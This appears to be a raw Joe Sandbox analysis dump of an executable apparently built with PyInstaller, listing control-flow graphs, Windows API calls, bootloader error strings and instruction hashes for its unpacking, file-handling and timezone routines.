143->146 144->146 147 7ff61e8e3b14-7ff61e8e3b17 145->147 148 7ff61e8e3a56-7ff61e8e3a5a 145->148 157 7ff61e8e3a92-7ff61e8e3aa6 call 7ff61e8e8940 146->157 158 7ff61e8e3aab-7ff61e8e3ac0 146->158 150 7ff61e8e3b2f-7ff61e8e3b40 call 7ff61e8e2710 147->150 151 7ff61e8e3b19-7ff61e8e3b1d 147->151 148->147 149 7ff61e8e3a60 148->149 149->143 159 7ff61e8e3c7f-7ff61e8e3c87 150->159 151->150 155 7ff61e8e3b1f-7ff61e8e3b2a 151->155 155->146 157->158 161 7ff61e8e3ac6-7ff61e8e3aca 158->161 162 7ff61e8e3be8-7ff61e8e3bfa call 7ff61e8e8830 158->162 159->99 164 7ff61e8e3ad0-7ff61e8e3ae8 call 7ff61e8f5250 161->164 165 7ff61e8e3bcd-7ff61e8e3be2 call 7ff61e8e1940 161->165 170 7ff61e8e3c2e 162->170 171 7ff61e8e3bfc-7ff61e8e3c02 162->171 175 7ff61e8e3b62-7ff61e8e3b7a call 7ff61e8f5250 164->175 176 7ff61e8e3aea-7ff61e8e3b02 call 7ff61e8f5250 164->176 165->161 165->162 177 7ff61e8e3c31-7ff61e8e3c40 call 7ff61e8f4f30 170->177 173 7ff61e8e3c04-7ff61e8e3c1c 171->173 174 7ff61e8e3c1e-7ff61e8e3c2c 171->174 173->177 174->177 184 7ff61e8e3b7c-7ff61e8e3b80 175->184 185 7ff61e8e3b87-7ff61e8e3b9f call 7ff61e8f5250 175->185 176->165 186 7ff61e8e3b08-7ff61e8e3b0f 176->186 187 7ff61e8e3d41-7ff61e8e3d63 call 7ff61e8e44e0 177->187 188 7ff61e8e3c46-7ff61e8e3c4a 177->188 184->185 201 7ff61e8e3ba1-7ff61e8e3ba5 185->201 202 7ff61e8e3bac-7ff61e8e3bc4 call 7ff61e8f5250 185->202 186->165 199 7ff61e8e3d65-7ff61e8e3d6f call 7ff61e8e4630 187->199 200 7ff61e8e3d71-7ff61e8e3d82 call 7ff61e8e1c80 187->200 191 7ff61e8e3cd4-7ff61e8e3ce6 call 7ff61e8e8830 188->191 192 7ff61e8e3c50-7ff61e8e3c5f call 7ff61e8e90e0 188->192 205 7ff61e8e3d35-7ff61e8e3d3c 191->205 206 7ff61e8e3ce8-7ff61e8e3ceb 191->206 203 7ff61e8e3cb3-7ff61e8e3cb6 call 7ff61e8e8660 192->203 204 7ff61e8e3c61 192->204 213 7ff61e8e3d87-7ff61e8e3d96 199->213 200->213 201->202 202->165 221 7ff61e8e3bc6 202->221 220 7ff61e8e3cbb-7ff61e8e3cbd 203->220 210 7ff61e8e3c68 call 7ff61e8e2710 204->210 205->210 206->205 211 7ff61e8e3ced-7ff61e8e3d10 call 7ff61e8e1c80 206->211 222 7ff61e8e3c6d-7ff61e8e3c77 210->222 228 7ff61e8e3d12-7ff61e8e3d26 call 7ff61e8e2710 call 7ff61e8f4f30 211->228 229 7ff61e8e3d2b-7ff61e8e3d33 call 7ff61e8f4f30 211->229 218 7ff61e8e3dc4-7ff61e8e3dda call 7ff61e8e9390 213->218 219 7ff61e8e3d98-7ff61e8e3d9f 213->219 234 7ff61e8e3ddc 218->234 235 7ff61e8e3de8-7ff61e8e3e04 SetDllDirectoryW 218->235 219->218 224 7ff61e8e3da1-7ff61e8e3da5 219->224 226 7ff61e8e3cbf-7ff61e8e3cc6 220->226 227 7ff61e8e3cc8-7ff61e8e3ccf 220->227 221->165 222->159 224->218 230 7ff61e8e3da7-7ff61e8e3dbe SetDllDirectoryW LoadLibraryExW 224->230 226->210 227->213 228->222 229->213 230->218 234->235 236 7ff61e8e3f01-7ff61e8e3f08 235->236 237 7ff61e8e3e0a-7ff61e8e3e19 call 7ff61e8e8830 235->237 242 7ff61e8e3f0e-7ff61e8e3f15 236->242 243 7ff61e8e4008-7ff61e8e4010 236->243 250 7ff61e8e3e32-7ff61e8e3e3c call 7ff61e8f4f30 237->250 251 7ff61e8e3e1b-7ff61e8e3e21 237->251 242->243 248 7ff61e8e3f1b-7ff61e8e3f25 call 7ff61e8e33c0 242->248 244 7ff61e8e4012-7ff61e8e402f PostMessageW GetMessageW 243->244 245 7ff61e8e4035-7ff61e8e4067 call 7ff61e8e36a0 call 7ff61e8e3360 call 7ff61e8e3670 call 7ff61e8e6fc0 call 7ff61e8e6d70 243->245 244->245 248->222 258 7ff61e8e3f2b-7ff61e8e3f3f call 7ff61e8e90c0 248->258 263 7ff61e8e3ef2-7ff61e8e3efc call 7ff61e8e8940 250->263 264 7ff61e8e3e42-7ff61e8e3e48 250->264 254 7ff61e8e3e23-7ff61e8e3e2b 251->254 255 7ff61e8e3e2d-7ff61e8e3e2f 251->255 254->255 255->250 269 7ff61e8e3f64-7ff61e8e3fa0 call 7ff61e8e8940 call 7ff61e8e89e0 call 7ff61e8e6fc0 call 7ff61e8e6d70 call 7ff61e8e88e0 258->269 270 7ff61e8e3f41-7ff61e8e3f5e PostMessageW GetMessageW 258->270 263->236 264->263 268 7ff61e8e3e4e-7ff61e8e3e54 264->268 272 7ff61e8e3e5f-7ff61e8e3e61 268->272 273 7ff61e8e3e56-7ff61e8e3e58 268->273 308 7ff61e8e3fa5-7ff61e8e3fa7 269->308 270->269 272->236 277 7ff61e8e3e67-7ff61e8e3e83 call 7ff61e8e6dc0 call 7ff61e8e7340 272->277 276 7ff61e8e3e5a 273->276 273->277 276->236 289 7ff61e8e3e85-7ff61e8e3e8c 277->289 290 7ff61e8e3e8e-7ff61e8e3e95 277->290 292 7ff61e8e3edb-7ff61e8e3ef0 call 7ff61e8e2a50 call 7ff61e8e6fc0 call 7ff61e8e6d70 289->292 293 7ff61e8e3eaf-7ff61e8e3eb9 call 7ff61e8e71b0 290->293 294 7ff61e8e3e97-7ff61e8e3ea4 call 7ff61e8e6e00 290->294 292->236 306 7ff61e8e3ec4-7ff61e8e3ed2 call 7ff61e8e74f0 293->306 307 7ff61e8e3ebb-7ff61e8e3ec2 293->307 294->293 305 7ff61e8e3ea6-7ff61e8e3ead 294->305 305->292 306->236 317 7ff61e8e3ed4 306->317 307->292 311 7ff61e8e3ff5-7ff61e8e4003 call 7ff61e8e1900 308->311 312 7ff61e8e3fa9-7ff61e8e3fbf call 7ff61e8e8ed0 call 7ff61e8e88e0 308->312 311->222 312->311 323 7ff61e8e3fc1-7ff61e8e3fd6 312->323 317->292 324 7ff61e8e3ff0 call 7ff61e8e2a50 323->324 325 7ff61e8e3fd8-7ff61e8e3feb call 7ff61e8e2710 call 7ff61e8e1900 323->325 324->311 325->222
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                                                                                                                                • API String ID: 2776309574-4232158417
                                                                                                                                                                                                                • Opcode ID: 9db08009f9163a53b25ab8bbdba1475377257322832201579c571555304dfb08
                                                                                                                                                                                                                • Instruction ID: d6a71cb3e35e9b490fb5299cd30ab24940975e4e57f5f3e1add58e45f9e8568e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9db08009f9163a53b25ab8bbdba1475377257322832201579c571555304dfb08
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB328221E0CE8291FB99DB26D4553B966A1AF65FA0F844432FA5DC32D6EF2CF954C300

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 479 7ff61e905c00-7ff61e905c3b call 7ff61e905588 call 7ff61e905590 call 7ff61e9055f8 486 7ff61e905e65-7ff61e905eb1 call 7ff61e8fa900 call 7ff61e905588 call 7ff61e905590 call 7ff61e9055f8 479->486 487 7ff61e905c41-7ff61e905c4c call 7ff61e905598 479->487 514 7ff61e905fef-7ff61e90605d call 7ff61e8fa900 call 7ff61e901578 486->514 515 7ff61e905eb7-7ff61e905ec2 call 7ff61e905598 486->515 487->486 492 7ff61e905c52-7ff61e905c5c 487->492 495 7ff61e905c7e-7ff61e905c82 492->495 496 7ff61e905c5e-7ff61e905c61 492->496 499 7ff61e905c85-7ff61e905c8d 495->499 498 7ff61e905c64-7ff61e905c6f 496->498 501 7ff61e905c71-7ff61e905c78 498->501 502 7ff61e905c7a-7ff61e905c7c 498->502 499->499 503 7ff61e905c8f-7ff61e905ca2 call 7ff61e8fd5fc 499->503 501->498 501->502 502->495 506 7ff61e905cab-7ff61e905cb9 502->506 509 7ff61e905ca4-7ff61e905ca6 call 7ff61e8fa948 503->509 510 7ff61e905cba-7ff61e905cc6 call 7ff61e8fa948 503->510 509->506 521 7ff61e905ccd-7ff61e905cd5 510->521 533 7ff61e90605f-7ff61e906066 514->533 534 7ff61e90606b-7ff61e90606e 514->534 515->514 522 7ff61e905ec8-7ff61e905ed3 call 7ff61e9055c8 515->522 521->521 524 7ff61e905cd7-7ff61e905ce8 call 7ff61e900474 521->524 522->514 531 7ff61e905ed9-7ff61e905efc call 7ff61e8fa948 GetTimeZoneInformation 522->531 524->486 532 7ff61e905cee-7ff61e905d44 call 7ff61e90a4d0 * 4 call 7ff61e905b1c 524->532 546 7ff61e905fc4-7ff61e905fee call 7ff61e905580 call 7ff61e905570 call 7ff61e905578 531->546 547 7ff61e905f02-7ff61e905f23 531->547 592 7ff61e905d46-7ff61e905d4a 532->592 535 7ff61e9060fb-7ff61e9060fe 533->535 536 7ff61e9060a5-7ff61e9060b8 call 7ff61e8fd5fc 534->536 537 7ff61e906070 534->537 540 7ff61e906073 call 7ff61e905e7c 535->540 542 7ff61e906104-7ff61e90610c call 7ff61e905c00 535->542 557 7ff61e9060c3-7ff61e9060de call 7ff61e901578 536->557 558 7ff61e9060ba 536->558 537->540 552 7ff61e906078-7ff61e9060a4 call 7ff61e8fa948 call 7ff61e8ec550 540->552 542->552 553 7ff61e905f25-7ff61e905f2b 547->553 554 7ff61e905f2e-7ff61e905f35 547->554 553->554 562 7ff61e905f49 554->562 563 7ff61e905f37-7ff61e905f3f 554->563 574 7ff61e9060e5-7ff61e9060f7 call 7ff61e8fa948 557->574 575 7ff61e9060e0-7ff61e9060e3 557->575 565 7ff61e9060bc-7ff61e9060c1 call 7ff61e8fa948 558->565 568 7ff61e905f4b-7ff61e905fbf call 7ff61e90a4d0 * 4 call 7ff61e902b5c call 7ff61e906114 * 2 562->568 563->562 570 7ff61e905f41-7ff61e905f47 563->570 565->537 568->546 570->568 574->535 575->565 594 7ff61e905d50-7ff61e905d54 592->594 595 7ff61e905d4c 592->595 594->592 597 7ff61e905d56-7ff61e905d7b call 7ff61e8f6b58 594->597 595->594 603 7ff61e905d7e-7ff61e905d82 597->603 605 7ff61e905d84-7ff61e905d8f 603->605 606 7ff61e905d91-7ff61e905d95 603->606 605->606 608 7ff61e905d97-7ff61e905d9b 605->608 606->603 609 7ff61e905d9d-7ff61e905dc5 call 7ff61e8f6b58 608->609 610 7ff61e905e1c-7ff61e905e20 608->610 619 7ff61e905de3-7ff61e905de7 609->619 620 7ff61e905dc7 609->620 613 7ff61e905e22-7ff61e905e24 610->613 614 7ff61e905e27-7ff61e905e34 610->614 613->614 615 7ff61e905e4f-7ff61e905e5e call 7ff61e905580 call 7ff61e905570 614->615 616 7ff61e905e36-7ff61e905e4c call 7ff61e905b1c 614->616 615->486 616->615 619->610 625 7ff61e905de9-7ff61e905e07 call 7ff61e8f6b58 619->625 623 7ff61e905dca-7ff61e905dd1 620->623 623->619 626 7ff61e905dd3-7ff61e905de1 623->626 631 7ff61e905e13-7ff61e905e1a 625->631 626->619 626->623 631->610 632 7ff61e905e09-7ff61e905e0d 631->632 632->610 633 7ff61e905e0f 632->633 633->631
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF61E905C45
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E905598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61E9055AC
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E8FA948: RtlFreeHeap.NTDLL(?,?,?,00007FF61E902D22,?,?,?,00007FF61E902D5F,?,?,00000000,00007FF61E903225,?,?,?,00007FF61E903157), ref: 00007FF61E8FA95E
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E8FA948: GetLastError.KERNEL32(?,?,?,00007FF61E902D22,?,?,?,00007FF61E902D5F,?,?,00000000,00007FF61E903225,?,?,?,00007FF61E903157), ref: 00007FF61E8FA968
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E8FA900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF61E8FA8DF,?,?,?,?,?,00007FF61E8FA7CA), ref: 00007FF61E8FA909
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E8FA900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF61E8FA8DF,?,?,?,?,?,00007FF61E8FA7CA), ref: 00007FF61E8FA92E
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF61E905C34
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E9055F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61E90560C
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF61E905EAA
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF61E905EBB
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF61E905ECC
                                                                                                                                                                                                                • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF61E90610C), ref: 00007FF61E905EF3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                • API String ID: 4070488512-239921721
                                                                                                                                                                                                                • Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                • Instruction ID: f139f3a9a61fc869887df950bf090784bf9db9fd693e2758c7f7d3b4b357a4ae
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6ED1C036A08A5286EB60DF22D4401B96769EFA4FB4F848936FA4DC7697DF3CF4418740

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 693 7ff61e906964-7ff61e9069d7 call 7ff61e906698 696 7ff61e9069f1-7ff61e9069fb call 7ff61e8f8520 693->696 697 7ff61e9069d9-7ff61e9069e2 call 7ff61e8f4ee8 693->697 703 7ff61e9069fd-7ff61e906a14 call 7ff61e8f4ee8 call 7ff61e8f4f08 696->703 704 7ff61e906a16-7ff61e906a7f CreateFileW 696->704 702 7ff61e9069e5-7ff61e9069ec call 7ff61e8f4f08 697->702 717 7ff61e906d32-7ff61e906d52 702->717 703->702 705 7ff61e906a81-7ff61e906a87 704->705 706 7ff61e906afc-7ff61e906b07 GetFileType 704->706 709 7ff61e906ac9-7ff61e906af7 GetLastError call 7ff61e8f4e7c 705->709 710 7ff61e906a89-7ff61e906a8d 705->710 712 7ff61e906b5a-7ff61e906b61 706->712 713 7ff61e906b09-7ff61e906b44 GetLastError call 7ff61e8f4e7c CloseHandle 706->713 709->702 710->709 715 7ff61e906a8f-7ff61e906ac7 CreateFileW 710->715 720 7ff61e906b63-7ff61e906b67 712->720 721 7ff61e906b69-7ff61e906b6c 712->721 713->702 728 7ff61e906b4a-7ff61e906b55 call 7ff61e8f4f08 713->728 715->706 715->709 722 7ff61e906b72-7ff61e906bc7 call 7ff61e8f8438 720->722 721->722 723 7ff61e906b6e 721->723 731 7ff61e906bc9-7ff61e906bd5 call 7ff61e9068a0 722->731 732 7ff61e906be6-7ff61e906c17 call 7ff61e906418 722->732 723->722 728->702 731->732 738 7ff61e906bd7 731->738 739 7ff61e906c1d-7ff61e906c5f 732->739 740 7ff61e906c19-7ff61e906c1b 732->740 743 7ff61e906bd9-7ff61e906be1 call 7ff61e8faac0 738->743 741 7ff61e906c81-7ff61e906c8c 739->741 742 7ff61e906c61-7ff61e906c65 739->742 740->743 745 7ff61e906c92-7ff61e906c96 741->745 746 7ff61e906d30 741->746 742->741 744 7ff61e906c67-7ff61e906c7c 742->744 743->717 744->741 745->746 748 7ff61e906c9c-7ff61e906ce1 CloseHandle CreateFileW 745->748 746->717 750 7ff61e906ce3-7ff61e906d11 GetLastError call 7ff61e8f4e7c call 7ff61e8f8660 748->750 751 7ff61e906d16-7ff61e906d2b 748->751 750->751 751->746
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1617910340-0
                                                                                                                                                                                                                • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                • Instruction ID: 497b87a93ac96d302d8da61312693ac554248a01d8a42db04bc9c811171a2109
                                                                                                                                                                                                                • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7C1B032B28E4185EB50CF69C4902AC3765EB59FA8B514635EE2ED7B96DF38E051C340

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(?,00007FF61E8E8919,00007FF61E8E3FA5), ref: 00007FF61E8E842B
                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?,00007FF61E8E8919,00007FF61E8E3FA5), ref: 00007FF61E8E84AE
                                                                                                                                                                                                                • DeleteFileW.KERNELBASE(?,00007FF61E8E8919,00007FF61E8E3FA5), ref: 00007FF61E8E84CD
                                                                                                                                                                                                                • FindNextFileW.KERNELBASE(?,00007FF61E8E8919,00007FF61E8E3FA5), ref: 00007FF61E8E84DB
                                                                                                                                                                                                                • FindClose.KERNEL32(?,00007FF61E8E8919,00007FF61E8E3FA5), ref: 00007FF61E8E84EC
                                                                                                                                                                                                                • RemoveDirectoryW.KERNELBASE(?,00007FF61E8E8919,00007FF61E8E3FA5), ref: 00007FF61E8E84F5
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                • String ID: %s\*
                                                                                                                                                                                                                • API String ID: 1057558799-766152087
                                                                                                                                                                                                                • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                • Instruction ID: 0bf683ff4c961378b41eee883d85e3026d2ac74c13c37af28762a41f8004205f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB416031A1CE4285EAA09B65E5441BEA364FBA4F78F840632F99EC26D5EF3CF5458700

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 1014 7ff61e905e7c-7ff61e905eb1 call 7ff61e905588 call 7ff61e905590 call 7ff61e9055f8 1021 7ff61e905fef-7ff61e90605d call 7ff61e8fa900 call 7ff61e901578 1014->1021 1022 7ff61e905eb7-7ff61e905ec2 call 7ff61e905598 1014->1022 1034 7ff61e90605f-7ff61e906066 1021->1034 1035 7ff61e90606b-7ff61e90606e 1021->1035 1022->1021 1027 7ff61e905ec8-7ff61e905ed3 call 7ff61e9055c8 1022->1027 1027->1021 1033 7ff61e905ed9-7ff61e905efc call 7ff61e8fa948 GetTimeZoneInformation 1027->1033 1045 7ff61e905fc4-7ff61e905fee call 7ff61e905580 call 7ff61e905570 call 7ff61e905578 1033->1045 1046 7ff61e905f02-7ff61e905f23 1033->1046 1036 7ff61e9060fb-7ff61e9060fe 1034->1036 1037 7ff61e9060a5-7ff61e9060b8 call 7ff61e8fd5fc 1035->1037 1038 7ff61e906070 1035->1038 1040 7ff61e906073 call 7ff61e905e7c 1036->1040 1042 7ff61e906104-7ff61e90610c call 7ff61e905c00 1036->1042 1054 7ff61e9060c3-7ff61e9060de call 7ff61e901578 1037->1054 1055 7ff61e9060ba 1037->1055 1038->1040 1049 7ff61e906078-7ff61e9060a4 call 7ff61e8fa948 call 7ff61e8ec550 1040->1049 1042->1049 1050 7ff61e905f25-7ff61e905f2b 1046->1050 1051 7ff61e905f2e-7ff61e905f35 1046->1051 1050->1051 1058 7ff61e905f49 1051->1058 1059 7ff61e905f37-7ff61e905f3f 1051->1059 1068 7ff61e9060e5-7ff61e9060f7 call 7ff61e8fa948 1054->1068 1069 7ff61e9060e0-7ff61e9060e3 1054->1069 1061 7ff61e9060bc-7ff61e9060c1 call 7ff61e8fa948 1055->1061 1063 7ff61e905f4b-7ff61e905fbf call 7ff61e90a4d0 * 4 call 7ff61e902b5c call 7ff61e906114 * 2 1058->1063 1059->1058 1065 7ff61e905f41-7ff61e905f47 1059->1065 1061->1038 1063->1045 1065->1063 1068->1036 1069->1061
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF61E905EAA
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E9055F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61E90560C
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF61E905EBB
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E905598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61E9055AC
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF61E905ECC
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E9055C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61E9055DC
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E8FA948: RtlFreeHeap.NTDLL(?,?,?,00007FF61E902D22,?,?,?,00007FF61E902D5F,?,?,00000000,00007FF61E903225,?,?,?,00007FF61E903157), ref: 00007FF61E8FA95E
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E8FA948: GetLastError.KERNEL32(?,?,?,00007FF61E902D22,?,?,?,00007FF61E902D5F,?,?,00000000,00007FF61E903225,?,?,?,00007FF61E903157), ref: 00007FF61E8FA968
                                                                                                                                                                                                                • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF61E90610C), ref: 00007FF61E905EF3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                • API String ID: 3458911817-239921721
                                                                                                                                                                                                                • Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                • Instruction ID: 634e52292f880b0d47d8cf4d12656bc4a60d3ed7fa4ac7f37926705877b5238c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
